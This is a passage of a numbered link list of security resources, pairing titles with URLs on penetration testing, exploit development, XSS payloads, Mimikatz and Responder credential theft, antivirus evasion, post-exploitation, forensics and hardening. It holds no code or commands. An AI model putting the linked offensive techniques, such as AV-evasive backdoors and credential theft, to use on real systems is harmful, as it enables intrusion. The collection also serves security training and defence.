-1292-Some Free Reverse engineering resources: https://pastebin.com/si2ThQPP -1293-Sans: https://pastebin.com/MKiSnjLm -1294-Metasploit Next Level: https://pastebin.com/0jC1BUiv -1295-Just playing around....: https://pastebin.com/gHXPzf6B -1296-Red Team Course: https://pastebin.com/YUYSXNpG -1297-New Exploit Development 2018: https://pastebin.com/xaRxgYqQ -1298-Good reviews of CTP/OSCE (in no particular order):: https://pastebin.com/RSPbatip -1299-Vulnerability Research Engineering Bookmarks Collection v1.0: https://pastebin.com/8mUhjGSU -1300-Professional-hacker's Pastebin : https://pastebin.com/u/Professional-hacker -1301-Google Cheat Sheet: http://www.googleguide.com/print/adv_op_ref.pdf -1302-Shodan for penetration testers: https://www.defcon.org/images/defcon-18/dc-18-presentations/Schearer/DEFCON-18-Schearer-SHODAN.pdf -1303-Linux networking tools: https://gist.github.com/miglen/70765e663c48ae0544da08c07006791f -1304-DNS spoofing with NetHunter: https://cyberarms.wordpress.com/category/nethunter-tutorial/ -1305-Tips on writing a penetration testing report: https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 -1306-Technical penetration report sample: https://tbgsecurity.com/wordpress/wp-content/uploads/2016/11/Sample-Penetration-Test-Report.pdf -1307-Nessus sample reports: https://www.tenable.com/products/nessus/sample-reports -1308-Sample penetration testing report: https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf -1309-jonh-the-ripper-cheat-sheet: https://countuponsecurity.com/2015/06/14/jonh-the-ripper-cheat-sheet/ -1310-ultimate guide to cracking foreign character passwords using hashcat: http://www.netmux.com/blog/ultimate-guide-to-cracking-foreign-character-passwords-using-has -1311-Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III: https://www.unix-ninja.com/p/Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III -1312-cracking story how i cracked over 122 million sha1 and md5 hashed passwords: http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords/ -1313-CSA (Cloud Security Alliance) Security White Papers: https://cloudsecurityalliance.org/download/ -1314-NIST Security Considerations in the System Development Life Cycle: https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-64r2.pdf -1315-ISO 29100 information technology security techniques privacy framework: https://www.iso.org/standard/45123.html -1316-NIST National Checklist Program: https://nvd.nist.gov/ncp/repository -1317-OWASP Guide to Cryptography: https://www.owasp.org/index.php/Guide_to_Cryptography -1318-NVD (National Vulnerability Database): https://nvd.nist.gov/ -1319-CVE details: https://cvedetails.com/ -1320-CIS Cybersecurity Tools: https://www.cisecurity.org/cybersecurity-tools/ -1321-Security aspects of virtualization by ENISA: https://www.enisa.europa.eu/publications/security-aspects-of-virtualization/ -1322-CIS Benchmarks also provides a security guide for VMware, Docker, and Kubernetes: https://www.cisecurity.org/cis-benchmarks/ -1323-OpenStack's hardening of the virtualization layer provides a secure guide to building the virtualization layer: https://docs.openstack.org/security-guide/compute/hardening-the-virtualization-layers.html -1324-Docker security: https://docs.docker.com/engine/security/security/ -1325-Microsoft Security Development Lifecycle: http://www.microsoft.com/en-us/SDL/ -1326-OWASP SAMM Project: https://www.owasp.org/index.php/OWASP_SAMM_Project -1327-CWE/SANS Top 25 Most Dangerous Software Errors: https://cwe.mitre.org/top25/ -1329-OWASP Vulnerable Web Applications Directory Project: https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project -1330-CERT Secure Coding Standards: https://wiki.sei.cmu.edu/confluence/display/seccode/SEI+CERT+Coding+Standards -1331-NIST Special Publication 800-53: https://nvd.nist.gov/800-53 -1332-SAFECode Security White Papers: https://safecode.org/publications/ -1333-Microsoft Threat Modeling tool 2016: https://aka.ms/tmt2016/ -1334-Apache Metron for real-time big data security: http://metron.apache.org/documentation/ -1335-Introducing OCTAVE Allegro: Improving the Information Security Risk Assessment Process: https://resources.sei.cmu.edu/asset_files/TechnicalReport/2007_005_001_14885.pdf -1336-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems: http://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-18r1.pdf -1337-ITU-T X.805 (10/2003) Security architecture for systems providing end- to-end communications: https://www.itu.int/rec/dologin_pub.asp?lang=e&id=T-REC-X.805-200310-I!!PDF-E&type=items -1338-ETSI TS 102 165-1 V4.2.1 (2006-12) : Method and proforma for Threat, Risk, Vulnerability Analysis: http://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.01_60/ts_10216501v040201p.pdf -1339-SAFECode Fundamental Practices for Secure Software Development: https://safecode.org/wp-content/uploads/2018/03/SAFECode_Fundamental_Practices_for_Secure_Software_Development_March_2018.pdf -1340-NIST 800-64 Security Considerations in the System Development Life Cycle: https://csrc.nist.gov/publications/detail/sp/800-64/rev-2/final -1341-SANS A Security Checklist for Web Application Design: https://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389 -1342-Best Practices for implementing a Security Awareness Program: https://www.pcisecuritystandards.org/documents/PCI_DSS_V1.0_Best_Practices_for_Implementing_Security_Awareness_Program.pdf -1343-ETSI TS 102 165-1 V4.2.1 (2006-12): Method and proforma for Threat, Risk, Vulnerability Analysis: http://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.03_60/ts_10216501v040203p.pdf -1344-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems: https://csrc.nist.gov/publications/detail/sp/800-18/rev-1/final -1345-SafeCode Tactical Threat Modeling: https://safecode.org/safecodepublications/tactical-threat-modeling/ -1346-SANS Web Application Security Design Checklist: https://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389 -1347-Data Anonymization for production data dumps: https://github.com/sunitparekh/data-anonymization -1348-SANS Continuous Monitoring—What It Is, Why It Is Needed, and How to Use It: https://www.sans.org/reading-room/whitepapers/analyst/continuous-monitoring-is-needed-35030 -1349-Guide to Computer Security Log Management: https://ws680.nist.gov/publication/get_pdf.cfm?pub_id=50881 -1350-Malware Indicators: https://github.com/citizenlab/malware-indicators -1351-OSINT Threat Feeds: https://www.circl.lu/doc/misp/feed-osint/ -1352-SANS How to Use Threat Intelligence effectively: https://www.sans.org/reading-room/whitepapers/analyst/threat-intelligence-is-effectively-37282 -1353-NIST 800-150 Guide to Cyber Threat Information Sharing: https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-150.pdf -1354-Securing Web Application Technologies Checklist: https://software-security.sans.org/resources/swat -1355-Firmware Security Training: https://github.com/advanced-threat-research/firmware-security-training -1356-Burp Suite Bootcamp: https://pastebin.com/5sG7Rpg5 -1357-Web app hacking: https://pastebin.com/ANsw7WRx -1358-XSS Payload: https://pastebin.com/EdxzE4P1 -1359-XSS Filter Evasion Cheat Sheet: https://pastebin.com/bUutGfSy -1360-Persistence using RunOnceEx – Hidden from Autoruns.exe: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ -1361-Windows Operating System Archaeology: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology -1362-How to Backdoor Windows 10 Using an Android Phone & USB Rubber Ducky: https://www.prodefence.org/how-to-backdoor-windows-10-using-an-android-phone-usb-rubber-ducky/ -1363-Malware Analysis using Osquery : https://hackernoon.com/malware-analysis-using-osquery-part-2-69f08ec2ecec -1364-Tales of a Blue Teamer: Detecting Powershell Empire shenanigans with Sysinternals : https://holdmybeersecurity.com/2019/02/27/sysinternals-for-windows-incident-response/ -1365-Userland registry hijacking: https://3gstudent.github.io/Userland-registry-hijacking/ -1366-Malware Hiding Techniques to Watch for: AlienVault Labs: https://www.alienvault.com/blogs/labs-research/malware-hiding-techniques-to-watch-for-alienvault-labs -1367- Full text of "Google hacking for penetration testers" : https://archive.org/stream/pdfy-TPtNL6_ERVnbod0r/Google+Hacking+-+For+Penetration+Tester_djvu.txt -1368- Full text of "Long, Johnny Google Hacking For Penetration Testers" : https://archive.org/stream/LongJohnnyGoogleHackingForPenetrationTesters/Long%2C%20Johnny%20-%20Google%20Hacking%20for%20Penetration%20Testers_djvu.txt -1369- Full text of "Coding For Penetration Testers" : https://archive.org/stream/CodingForPenetrationTesters/Coding%20for%20Penetration%20Testers_djvu.txt -1370- Full text of "Hacking For Dummies" : https://archive.org/stream/HackingForDummies/Hacking%20For%20Dummies_djvu.txt -1371-Full text of "Wiley. Hacking. 5th. Edition. Jan. 2016. ISBN. 1119154685. Profescience.blogspot.com" : https://archive.org/stream/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com_djvu.txt -1372- Full text of "Social Engineering The Art Of Human Hacking" : https://archive.org/stream/SocialEngineeringTheArtOfHumanHacking/Social%20Engineering%20-%20The%20Art%20of%20Human%20Hacking_djvu.txt -1373- Full text of "CYBER WARFARE" : https://archive.org/stream/CYBERWARFARE/CYBER%20WARFARE_djvu.txt -1374-Full text of "NSA DOCID: 4046925 Untangling The Web: A Guide To Internet Research" : https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt -1375- Full text of "sectools" : https://archive.org/stream/sectools/hack-the-stack-network-security_djvu.txt -1376- Full text of "Aggressive network self-defense" : https://archive.org/stream/pdfy-YNtvDJueGZb1DCDA/Aggressive%20Network%20Self-Defense_djvu.txt -1377-Community Texts: https://archive.org/details/opensource?and%5B%5D=%28language%3Aeng+OR+language%3A%22English%22%29+AND+subject%3A%22google%22 -1378- Full text of "Cyber Spying - Tracking (sometimes).PDF (PDFy mirror)" : https://archive.org/stream/pdfy-5-Ln_yPZ22ondBJ8/Cyber%20Spying%20-%20Tracking%20%28sometimes%29_djvu.txt -1379- Full text of "Enzyclopedia Of Cybercrime" : https://archive.org/stream/EnzyclopediaOfCybercrime/Enzyclopedia%20Of%20Cybercrime_djvu.txt -1380- Full text of "Information Security Management Handbook" : https://archive.org/stream/InformationSecurityManagementHandbook/Information%20Security%20Management%20Handbook_djvu.txt -1381- Full text of "ARMArchitecture Reference Manual" : https://archive.org/stream/ARMArchitectureReferenceManual/DetectionOfIntrusionsAndMalwareAndVulnerabilityAssessment2016_djvu.txt -1382- Full text of "Metasploit The Penetration Tester S Guide" : https://archive.org/stream/MetasploitThePenetrationTesterSGuide/Metasploit-The+Penetration+Tester+s+Guide_djvu.txt -1383-Tips & tricks to master Google’s search engine: https://medium.com/infosec-adventures/google-hacking-39599373be7d -1384-Ethical Google Hacking - Sensitive Doc Dork (Part 2) : https://securing-the-stack.teachable.com/courses/ethical-google-hacking-1/lectures/3877866 -1385- Google Hacking Secrets:the Hidden Codes of Google : https://www.ma-no.org/en/security/google-hacking-secrets-the-hidden-codes-of-google -1386-google hacking: https://www.slideshare.net/SamNizam/3-google-hacking -1387-How Penetration Testers Use Google Hacking: https://www.cqure.nl/kennisplatform/how-penetration-testers-use-google-hacking -1388-Free Automated Malware Analysis Sandboxes and Services: https://zeltser.com/automated-malware-analysis/ -1389-How to get started with Malware Analysis and Reverse Engineering: https://0ffset.net/miscellaneous/how-to-get-started-with-malware-analysis/ -1390-Handy Tools And Websites For Malware Analysis: https://www.informationsecuritybuzz.com/articles/handy-tools-and-websites/ -1391-Dynamic Malware Analysis: https://prasannamundas.com/share/dynamic-malware-analysis/ -1392-Intro to Radare2 for Malware Analysis: https://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/ -1393-Detecting malware through static and dynamic techniques: https://technical.nttsecurity.com/.../detecting-malware-through-static-and-dynamic-tec... -1394-Malware Analysis Tutorial : Tricks for Confusing Static Analysis Tools: https://www.prodefence.org/malware-analysis-tutorial-tricks-confusing-static-analysis-tools -1395-Malware Analysis Lab At Home In 5 Steps: https://ethicalhackingguru.com/malware-analysis-lab-at-home-in-5-steps/ -1396-Malware Forensics Guide - Static and Dynamic Approach: https://www.yeahhub.com/malware-forensics-guide-static-dynamic-approach/ -1397-Top 30 Bug Bounty Programs in 2019: https://www.guru99.com/bug-bounty-programs.html -1398-Introduction - Book of BugBounty Tips: https://gowsundar.gitbook.io/book-of-bugbounty-tips/ -1399-List of bug bounty writeups: https://pentester.land/list-of-bug-bounty-writeups.html -1400-Tips From A Bugbounty Hunter: https://www.secjuice.com/bugbounty-hunter/ -1401-Cross Site Scripting (XSS) - Book of BugBounty Tips: https://gowsundar.gitbook.io/book-of-bugbounty-tips/cross-site-scripting-xss -1402-BugBountyTips: https://null0xp.wordpress.com/tag/bugbountytips/ -1403-Xss Filter Bypass Payloads: www.oroazteca.net/mq67/xss-filter-bypass-payloads.html -1404-Bug Bounty Methodology: https://eforensicsmag.com/bug-bounty-methodology-ttp-tacticstechniques-and-procedures-v-2-0 -1405-GDB cheat-sheet for exploit development: www.mannulinux.org/2017/01/gdb-cheat-sheet-for-exploit-development.html -1406-A Study in Exploit Development - Part 1: Setup and Proof of Concept : https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept -1407-Exploit development tutorial : https://www.computerweekly.com/tutorial/Exploit-development-tutorial-Part-Deux -1408-exploit code development: http://www.phreedom.org/presentations/exploit-code-development/exploit-code-development.pdf -1409-“Help Defeat Denial of Service Attacks: Step-by-Step”: http://www.sans.org/dosstep/ -1410-Internet Firewalls: Frequently Asked Questions: http://www.interhack.net/pubs/fwfaq/ -1411-Service Name and Transport Protocol Port Number: http://www.iana.org/assignments/port-numbers -1412-10 Useful Open Source Security Firewalls for Linux Systems: https://www.tecmint.com/open-source-security-firewalls-for-linux-systems/ -1413-40 Linux Server Hardening Security Tips: https://www.cyberciti.biz/tips/linux-security.html -1414-Linux hardening: A 15-step checklist for a secure Linux server : https://www.computerworld.com/.../linux-hardening-a-15-step-checklist-for-a-secure-linux-server -1415-25 Hardening Security Tips for Linux Servers: https://www.tecmint.com/linux-server-hardening-security-tips/ -1416-How to Harden Unix/Linux Systems & Close Security Gaps: https://www.beyondtrust.com/blog/entry/harden-unix-linux-systems-close-security-gaps -1417-34 Linux Server Security Tips & Checklists for Sysadmins: https://www.process.st/server-security/ -1418-Linux Hardening: https://www.slideshare.net/MichaelBoelen/linux-hardening -1419-23 Hardening Tips to Secure your Linux Server: https://www.rootusers.com/23-hardening-tips-to-secure-your-linux-server/ -1420-What is the Windows Registry? : https://www.computerhope.com/jargon/r/registry.htm -1421-Windows Registry, Everything You Need To Know: https://www.gammadyne.com/registry.htm -1422-Windows Registry Tutorial: https://www.akadia.com/services/windows_registry_tutorial.html -1423-5 Tools to Scan a Linux Server for Malware and Rootkits: https://www.tecmint.com/scan-linux-for-malware-and-rootkits/ -1424-Subdomain takeover dew to missconfigured project settings for Custom domain .: https://medium.com/bugbountywriteup/subdomain-takeover-dew-to-missconfigured-project-settings-for-custom-domain-46e90e702969 -1425-Massive Subdomains p0wned: https://medium.com/bugbountywriteup/massive-subdomains-p0wned-80374648336e -1426-Subdomain Takeover: Basics: https://0xpatrik.com/subdomain-takeover-basics/ -1427-Subdomain Takeover: Finding Candidates: https://0xpatrik.com/subdomain-takeover-candidates/ -1428-Bugcrowd's Domain & Subdomain Takeover!: https://bugbountypoc.com/bugcrowds-domain-takeover/ -1429-What Are Subdomain Takeovers, How to Test and Avoid Them?: https://dzone.com/articles/what-are-subdomain-takeovers-how-to-test-and-avoid -1430-Finding Candidates for Subdomain Takeovers: https://jarv.is/notes/finding-candidates-subdomain-takeovers/ -1431-Subdomain takeover of blog.snapchat.com: https://hackernoon.com/subdomain-takeover-of-blog-snapchat-com-60860de02fe7 -1432-Hostile Subdomain takeove: https://labs.detectify.com/tag/hostile-subdomain-takeover/ -1433-Microsoft Account Takeover Vulnerability Affecting 400 Million Users: https://www.safetydetective.com/blog/microsoft-outlook/ -1434-What is Subdomain Hijack/Takeover Vulnerability? How to Identify? & Exploit It?: https://blog.securitybreached.org/2017/10/11/what-is-subdomain-takeover-vulnerability/ -1435-Subdomain takeover detection with AQUATONE: https://michenriksen.com/blog/subdomain-takeover-detection-with-aquatone/ -1436-A hostile subdomain takeover! – Breaking application security: https://evilenigma.blog/2019/03/12/a-hostile-subdomain-takeover/ -1437-Web Development Reading List: https://www.smashingmagazine.com/2017/03/web-development-reading-list-172/ -1438-CSRF Attack can lead to Stored XSS: https://medium.com/bugbountywriteup/csrf-attack-can-lead-to-stored-xss-f40ba91f1e4f -1439-What is Mimikatz: The Beginner's Guide | Varonis: https://www.varonis.com/bog/what-is-mimikatz -1440-Preventing Mimikatz Attacks : https://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5 -1441-Mimikatz tutorial: How it hacks Windows passwords, credentials: https://searchsecurity.techtarget.com/.../Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials -1442-Mimikatz: Walkthrough [Updated 2019]: https://resources.infosecinstitute.com/mimikatz-walkthrough/ -1443-Mimikatz -Windows Tutorial for Beginner: https://hacknpentest.com/mimikatz-windows-tutorial-beginners-guide-part-1/ -1444-Mitigations against Mimikatz Style Attacks: https://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks -1445-Exploring Mimikatz - Part 1 : https://blog.xpnsec.com/exploring-mimikatz-part-1/ -1446-Powershell AV Evasion. Running Mimikatz with PowerLine: https://jlajara.gitlab.io/posts/2019/01/27/Mimikatz-AV-Evasion.html -1447-How to Steal Windows Credentials with Mimikatz and Metasploit: https://www.hackingloops.com/mimikatz/ -1448-Retrieving NTLM Hashes without touching LSASS: https://www.andreafortuna.org/2018/03/26/retrieving-ntlm-hashes-without-touching-lsass-the-internal-monologue-attack/ -1449-From Responder to NT Authority\SYSTEM: https://medium.com/bugbountywriteup/from-responder-to-nt-authority-system-39abd3593319 -1450-Getting Creds via NTLMv2: https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html -1451-Living off the land: stealing NetNTLM hashes: https://www.securify.nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html -1452-(How To) Using Responder to capture passwords on a Windows: www.securityflux.com/?p=303 -1453-Pwning with Responder - A Pentester's Guide: https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/ -1454-LLMNR and NBT-NS Poisoning Using Responder: https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/ -1455-Responder - Ultimate Guide : https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/guide/ -1456-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1457-LM, NTLM, Net-NTLMv2, oh my! : https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4 -1458-SMB Relay Attack Tutorial: https://intrinium.com/smb-relay-attack-tutorial -1459-Cracking NTLMv2 responses captured using responder: https://zone13.io/post/cracking-ntlmv2-responses-captured-using-responder/ -1460-Skip Cracking Responder Hashes and Relay Them: https://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/ -1461-Metasploit's First Antivirus Evasion Modules: https://blog.rapid7.com/2018/10/09/introducing-metasploits-first-evasion-module/ -1462-Evading Anti-virus Part 1: Infecting EXEs with Shellter: https://www.hackingloops.com/evading-anti-virus-shellter/ -1463-Evading AV with Shellter: https://www.securityartwork.es/2018/11/02/evading-av-with-shellter-i-also-have-sysmon-and-wazuh-i/ -1464-Shellter-A Shellcode Injecting Tool : https://www.hackingarticles.in/shellter-a-shellcode-injecting-tool/ -1465-Bypassing antivirus programs using SHELLTER: https://myhackstuff.com/shellter-bypassing-antivirus-programs/ -1466-John the Ripper step-by-step tutorials for end-users : openwall.info/wiki/john/tutorials -1467-Beginners Guide for John the Ripper (Part 1): https://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/ -1468-John the Ripper Basics Tutorial: https://ultimatepeter.com/john-the-ripper-basics-tutorial/ -1469-Crack Windows password with john the ripper: https://www.securitynewspaper.com/2018/11/27/crack-windows-password-with-john-the-ripper/ -1470-Getting Started Cracking Password Hashes with John the Ripper : https://www.tunnelsup.com/getting-started-cracking-password-hashes/ -1471-Shell code exploit with Buffer overflow: https://medium.com/@jain.sm/shell-code-exploit-with-buffer-overflow-8d78cc11f89b -1472-Shellcoding for Linux and Windows Tutorial : www.vividmachines.com/shellcode/shellcode.html -1473-Buffer Overflow Practical Examples : https://0xrick.github.io/binary-exploitation/bof5/ -1474-Msfvenom shellcode analysis: https://snowscan.io/msfvenom-shellcode-analysis/ -1475-Process Continuation Shellcode: https://azeria-labs.com/process-continuation-shellcode/ -1476-Dynamic Shellcode Execution: https://www.countercept.com/blog/dynamic-shellcode-execution/ -1477-Tutorials: Writing shellcode to binary files: https://www.fuzzysecurity.com/tutorials/7.html -1478-Creating Shellcode for an Egg Hunter : https://securitychops.com/2018/05/26/slae-assignment-3-egghunter-shellcode.html -1479-How to: Shellcode to reverse bind a shell with netcat : www.hackerfall.com/story/shellcode-to-reverse-bind-a-shell-with-netcat -1480-Bashing the Bash — Replacing Shell Scripts with Python: https://medium.com/capital-one-tech/bashing-the-bash-replacing-shell-scripts-with-python-d8d201bc0989 -1481-How to See All Devices on Your Network With nmap on Linux: https://www.howtogeek.com/.../how-to-see-all-devices-on-your-network-with-nmap-on-linux -1482-A Complete Guide to Nmap: https://www.edureka.co/blog/nmap-tutorial/ -1483-Nmap from Beginner to Advanced : https://resources.infosecinstitute.com/nmap/ -1484-Using Wireshark: Identifying Hosts and Users: https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/ -1485-tshark tutorial and filter examples: https://hackertarget.com/tshark-tutorial-and-filter-examples/ -1486-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example: https://www.guru99.com/fuzz-testing.html -1487-Tutorial: Dumb Fuzzing - Peach Community Edition: community.peachfuzzer.com/v3/TutorialDumbFuzzing.html -1488-HowTo: ExploitDev Fuzzing: https://hansesecure.de/2018/03/howto-exploitdev-fuzzing/ -1489-Fuzzing with Metasploit: https://www.corelan.be/?s=fuzzing -1490-Fuzzing – how to find bugs automagically using AFL: 9livesdata.com/fuzzing-how-to-find-bugs-automagically-using-afl/ -1491-Introduction to File Format Fuzzing & Exploitation: https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3 -1492-0x3 Python Tutorial: Fuzzer: https://www.primalsecurity.net/0x3-python-tutorial-fuzzer/ -1493-Hunting For Bugs With AFL: https://research.aurainfosec.io/hunting-for-bugs-101/ -1494-Fuzzing: The New Unit Testing: https://www.slideshare.net/DmitryVyukov/fuzzing-the-new-unit-testing -1495-Fuzzing With Peach Framework: https://www.terminatio.org/fuzzing-peach-framework-full-tutorial-download/ -1496-How we found a tcpdump vulnerability using cloud fuzzing: https://www.softscheck.com/en/identifying-security-vulnerabilities-with-cloud-fuzzing/ -1497-Finding a Fuzzer: Peach Fuzzer vs. Sulley: https://medium.com/@jtpereyda/finding-a-fuzzer-peach-fuzzer-vs-sulley-1fcd6baebfd4 -1498-Android malware analysis: https://www.slideshare.net/rossja/android-malware-analysis-71109948 -1499-15+ Malware Analysis Tools & Techniques : https://www.template.net/business/tools/malware-analysis/ -1500-30 Online Malware Analysis Sandboxes / Static Analyzers: https://medium.com/@su13ym4n/15-online-sandboxes-for-malware-analysis-f8885ecb8a35 -1501-Linux Command Line Forensics and Intrusion Detection Cheat Sheet: https://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/ -1502-Cheat Sheets - SANS Digital Forensics: https://digital-forensics.sans.org/community/cheat-sheets -1503-Breach detection with Linux filesystem forensics: https://opensource.com/article/18/4/linux-filesystem-forensics -1504-Digital Forensics Cheat Sheets Collection : https://neverendingsecurity.wordpress.com/digital-forensics-cheat-sheets-collection/ -1505-Security Incident Survey Cheat Sheet for Server Administrators: https://zeltser.com/security-incident-survey-cheat-sheet/ -1506-Digital forensics: A cheat sheet : https://www.techrepublic.com/article/digital-forensics-the-smart-persons-guide/ -1507-Windows Registry Forensics using 'RegRipper' Command-Line on Linux: https://www.pinterest.cl/pin/794815034207804059/ -1508-Windows IR Live Forensics Cheat Sheet: https://www.cheatography.com/koriley/cheat-sheets/windows-ir-live-forensics/ -1509-10 Best Known Forensics Tools That Works on Linux: https://linoxide.com/linux-how-to/forensics-tools-linux/ -1510-Top 20 Free Digital Forensic Investigation Tools for SysAdmins: https://techtalk.gfi.com/top-20-free-digital-forensic-investigation-tools-for-sysadmins/ -1511-Windows Volatile Memory Acquisition & Forensics 2018: https://medium.com/@lucideus/windows-volatile-memory-acquisition-forensics-2018-lucideus-forensics-3f297d0e5bfd -1512-PowerShell Cheat Sheet : https://www.digitalforensics.com/blog/powershell-cheat-sheet-2/ -1513-Forensic Artifacts: evidences of program execution on Windows systems: https://www.andreafortuna.org/forensic-artifacts-evidences-of-program-execution-on-windows-systems -1514-How to install a CPU?: https://www.computer-hardware-explained.com/how-to-install-a-cpu.html -1515-How To Upgrade and Install a New CPU or Motherboard: https://www.howtogeek.com/.../how-to-upgrade-and-install-a-new-cpu-or-motherboard-or-both -1516-Installing and Troubleshooting CPUs: www.pearsonitcertification.com/articles/article.aspx?p=1681054&seqNum=2 -1517-15 FREE Pastebin Alternatives You Can Use Right Away: https://www.rootreport.com/pastebin-alternatives/ -1518-Basic computer troubleshooting steps: https://www.computerhope.com/basic.htm -1519-18 Best Websites to Learn Computer Troubleshooting and Tech support: http://transcosmos.co.uk/best-websites-to-learn-computer-troubleshooting-and-tech-support -1520-Post Exploitation with PowerShell Empire 2.3.0 : https://www.yeahhub.com/post-exploitation-powershell-empire-2-3-0-detailed-tutorial/ -1521-Windows Persistence with PowerShell Empire : https://www.hackingarticles.in/windows-persistence-with-powershell-empire/ -1522-powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial: https://www.dudeworks.com/powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial -1523-Bypassing Anti-Virtus & Hacking Windows 10 Using Empire : https://zsecurity.org/bypassing-anti-virtus-hacking-windows-10-using-empire/ -1524-Hacking with Empire – PowerShell Post-Exploitation Agent : https://www.prodefence.org/hacking-with-empire-powershell-post-exploitation-agent/ -1525-Hacking Windows Active Directory Full guide: www.kalitut.com/hacking-windows-active-directory-full.html -1526-PowerShell Empire for Post-Exploitation: https://www.hackingloops.com/powershell-empire/ -1527-Generate A One-Liner – Welcome To LinuxPhilosophy!: linuxphilosophy.com/rtfm/more/empire/generate-a-one-liner/ -1528-CrackMapExec - Ultimate Guide: https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/ -1529-PowerShell Logging and Security: https://www.secjuice.com/enterprise-powershell-protection-logging/ -1530-Create your own FUD Backdoors with Empire: http://blog.extremehacking.org/blog/2016/08/25/create-fud-backdoors-empire/ -1531-PowerShell Empire Complete Tutorial For Beginners: https://video.hacking.reviews/2019/06/powershell-empire-complete-tutorial-for.html -1532-Bash Bunny: Windows Remote Shell using Metasploit & PowerShell: https://cyberarms.wordpress.com/.../bash-bunny-windows-remote-shell-using-metasploit-powershell -1533-Kerberoasting - Stealing Service Account Credentials: https://www.scip.ch/en/?labs.20181011 -1534-Automating Mimikatz with Empire and DeathStar : https://blog.stealthbits.com/automating-mimikatz-with-empire-and-deathstar/ -1535-Windows oneliners to get shell : https://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/ -1536-ObfuscatedEmpire : https://cobbr.io/ObfuscatedEmpire.html -1537-Pentesting with PowerShell in six steps: https://periciacomputacional.com/pentesting-with-powershell-in-six-steps/ -1538-Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM): https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm -1539-PowerShell Security Best Practices: https://www.digitalshadows.com/blog-and-research/powershell-security-best-practices/ -1540-You can detect PowerShell attacks: https://www.slideshare.net/Hackerhurricane/you-can-detect-powershell-attacks -1541-Detecting and Preventing PowerShell Attacks: https://www.eventsentry.com/.../powershell-pw3rh311-detecting-preventing-powershell-attacks -1542-Detecting Offensive PowerShell Attack Tools – Active Directory Security: https://adsecurity.org/?p=2604 -1543-An Internal Pentest Audit Against Active Directory: https://www.exploit-db.com/docs/46019 -1544-A complete Active Directory Penetration Testing Checklist : https://gbhackers.com/active-directory-penetration-testing-checklist/ -1545-Active Directory | Penetration Testing Lab: https://pentestlab.blog/tag/active-directory/ -1546-Building and Attacking an Active Directory lab with PowerShell : https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell -1547-Penetration Testing in Windows Server Active Directory using Metasploit: https://www.hackingarticles.in/penetration-testing-windows-server-active-directory-using-metasploit-part-1 -1548-Red Team Penetration Testing – Going All the Way (Part 2 of 3) : https://www.anitian.com/red-team-testing-going-all-the-way-part2/ -1549-Penetration Testing Active Directory, Part II: https://www.jishuwen.com/d/2Mtq -1550-Gaining Domain Admin from Outside Active Directory: https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html -1551-Post Exploitation Cheat Sheet: https://0xsecurity.com/blog/some-hacking-techniques/post-exploitation-cheat-sheet -1552-Windows post-exploitation : https://github.com/emilyanncr/Windows-Post-Exploitation -1553-OSCP - Windows Post Exploitation : https://hackingandsecurity.blogspot.com/2017/9/oscp-windows-post-exploitation.html -1554-Windows Post-Exploitation Command List: http://pentest.tonyng.net/windows-post-exploitation-command-list/ -1555-Windows Post-Exploitation Command List: http://tim3warri0r.blogspot.com/2012/09/windows-post-exploitation-command-list.html -1556-Linux Post-Exploitation · OSCP - Useful Resources: https://backdoorshell.gitbooks.io/oscp-useful-links/content/linux-post-exploitation.html -1557-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -1558-Pentesting Cheatsheets - Red Teaming Experiments: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets -1559-OSCP Goldmine: http://0xc0ffee.io/blog/OSCP-Goldmine -1560-Linux Post Exploitation Cheat 